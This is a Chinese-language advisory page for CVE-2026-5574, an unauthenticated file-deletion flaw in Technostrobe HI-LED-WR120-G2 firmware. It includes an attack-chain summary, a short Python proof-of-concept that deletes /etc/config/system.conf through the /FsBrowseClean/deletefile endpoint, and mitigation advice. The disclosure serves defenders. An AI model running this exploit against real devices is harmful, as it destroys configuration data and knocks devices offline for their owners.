CVE-2026-5574 CVSS 6.5 中危

CVE-2026-5574 Technostrobe HI-LED-WR120-G2 访问控制缺失漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5574

漏洞类型

访问控制缺失

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Technostrobe HI-LED-WR120-G2

漏洞概述

Technostrobe HI-LED-WR120-G2 5.5.0.1R6.03.30版本存在安全漏洞。其FsBrowseClean组件的deletefile函数未对dir/path参数进行有效授权验证。攻击者可远程利用此漏洞，无需用户交互即可删除系统文件，导致完整性与可用性受损，目前厂商尚未回应修复请求。

技术细节

该漏洞具体存在于Technostrobe HI-LED-WR120-G2设备固件版本5.5.0.1R6.03.30中，影响其Web管理服务中的FsBrowseClean组件。漏洞根源在于deletefile函数对用户输入的dir/path参数缺乏严格的授权检查和过滤机制。在正常业务逻辑中，该功能理应仅允许授权用户删除特定目录下的文件，但由于缺失权限控制，任何能够访问设备Web接口的攻击者均可构造特制的HTTP请求。攻击者通过修改请求中的dir/path参数，可以遍历系统目录并指定任意文件路径进行删除操作。这种利用方式无需用户交互，且攻击门槛较低，成功利用后可能导致系统关键配置文件丢失或应用程序崩溃，造成拒绝服务或数据完整性破坏。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出运行Technostrobe HI-LED-WR120-G2固件5.5.0.1R6.03.30的目标设备及其Web管理接口。

STEP 2

2. 漏洞利用

攻击者向目标设备的/FsBrowseClean/deletefile接口发送恶意HTTP请求，并在请求参数中注入恶意的dir和path路径。

STEP 3

3. 权限绕过

由于deletefile函数缺失授权验证，后端直接处理该请求，未对攻击者身份进行校验。

STEP 4

4. 执行攻击

系统执行删除操作，移除攻击者指定的文件，导致系统配置丢失或功能异常。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    # Target endpoint for the vulnerable deletefile function
    url = f"http://{target_ip}/FsBrowseClean/deletefile"
    
    # Malicious parameters to exploit the missing authorization
    # The 'dir' and 'path' arguments are manipulated to delete a specific file
    params = {
        "dir": "/etc/config",  # Example sensitive directory
        "path": "system.conf"   # Example critical file to delete
    }

    try:
        print(f"[+] Sending exploit request to {target_ip}...")
        response = requests.get(url, params=params, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. File may have been deleted.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Exploit failed due to network error: {e}")

if __name__ == "__main__":
    target = "192.168.1.100" # Replace with actual target IP
    exploit(target)

影响范围

Technostrobe HI-LED-WR120-G2 5.5.0.1R6.03.30

防御指南

临时缓解措施

鉴于厂商尚未发布修复补丁，建议立即通过网络访问控制列表（ACL）限制对设备管理端口的入站访问，或通过VPN隧道进行管理连接。此外，应检查并备份设备关键配置文件，防止因漏洞被利用导致的数据丢失。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表